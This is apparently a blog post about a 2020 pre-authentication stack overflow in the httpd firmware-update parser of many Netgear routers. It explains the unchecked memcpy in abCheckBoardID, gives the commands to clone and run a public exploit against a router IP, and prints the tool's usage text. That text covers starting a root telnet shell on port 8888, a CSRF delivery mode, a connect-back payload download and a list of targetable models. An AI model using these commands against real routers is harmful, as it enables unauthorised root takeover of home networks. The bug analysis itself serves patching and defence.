While I was doing routine maintenance of my wireless router, I noticed there’s a firmware update that fixed a RCE bug in the Netgear router. After some research on the Internet, it looks like the Netgear vulnerability is fairly new (disclosed in June, 2020) one. Many Netgear router models are impacted by this exploit, such as the popular R and WNDR series.
The Netgear exploit itself uses pre-authentication memcpy-based stack overflow, to allow a network-based attacker gain root access on the router. The exploit can start telnet on TCP port 8888, or carry any additional payload.
Before parsing generic HTTP requests, httpd checks to see if the provided HTTP request is part of the update process. If so, a separate request parser is used, as compared to the generic request parser. If this parser decides that the request is sending a firmware blob to update, the function abCheckBoardID (at offset 0x1BA78 in the httpd from the R7000 V188.8.131.52_1.2.23 firmware image) will be called to validate the POST’d image before upgrading. If the image begins with the string “*#$^”, the image will be parsed and a header will be copied to a stack variable. The length of the header will be taken from bytes 5-8 of the image and is not checked before the vulnerable memcpy (at offset 0x1BB18). Thus, by setting a size larger than the stack buffer, an attacker can overflow it and corrupt the saved registers. Further, because the overflow is memcpy based, the exploit is not limited by any encoding restrictions.https://github.com/grimm-co/NotQuite0DayFriday
To run the exploit for the Netgear models,
$ git clone https://github.com/grimm-co/NotQuite0DayFriday $ cd NotQuite0DayFriday/2020.06.15-netgear $ python exploit.py 192.168.1.1
The exploit can run additional commands (besides
/bin/utelnetd -p8888 -l/bin/sh -d), and ask the target to connect back to an IP to get payload.
usage: exploit.py [-h] [-command COMMAND] [-csrf] [-https] [-file] [-port PORT] [-model MODEL] [-version VERSION] [-local_ip LOCAL_IP] [-version-only] ip positional arguments: ip The IP address of the webserver to exploit optional arguments: -h, --help show this help message and exit -command COMMAND The command to run; default is to start telnet on port 8888 (or 3333 if 8888 is already used) -csrf Run a web server that sends the exploit as a CSRF payload -https Run the exploit against a webserver running HTTPS -file Write the exploit firmware to a file (which typically has a file extension .chk). Use the ip argument to specify the filename. -port PORT The port of the webserver to exploit -model MODEL The model of the webserver to exploit (default autodetect). Supported models are: EX6920, WNDR3400V2, R6400V2, R8300, R6700V3, MBR1200, WNDR3300V2, EX3800, WNR3500L, R4500, D6400, WNR1000V3, EX6150, WNDR3400V3, D8500, RS400, EX6130, WNCE3001, WNR3500, R7900, MVBR1210C, XR300, EX7000, R8500, R6900, EX6200, WNR3500V2, R6400, WNDR4000, R6200, R8000, LG2200D, DGN2200M, D7000V2, WNR3500LV2, WNDR4500V2, AC1450, WNDR3400, WN2500RP, WNDR3300, WN3100RP, D6300, WNR2000V2, R7850, R6200V2, WGR614V9, D6220, R6700, MBR624GU, WN3000RP, R7000, WNR834BV2, DC112A, WNDR3700V3, R6300, EX6000, EX3700, R6250, R7100LG, EX3920, DGN2200, R6300V2, WN3500RP, EX6120, WGR614V8, WGR614V10, WGT624V4, EX6100, DGND3700, MBRN3000, MBM621, WNDR4500, R6900P, R7000P, WN2500RPV2, DGN2200V4, MBR1516, MBR1515, R7300 -version VERSION The version of the webserver to exploit (default autodetect). -local_ip LOCAL_IP The IP address the exploited host should connect back to download a payload, only used on the devices: WNR3500, WNCE3001 (default autodetect). -version-only Only detect the model/version of a device, don't exploit
You should note that once the exploit is successful, the httpd server of the router will go down. Power cycling the router should bring the web server back.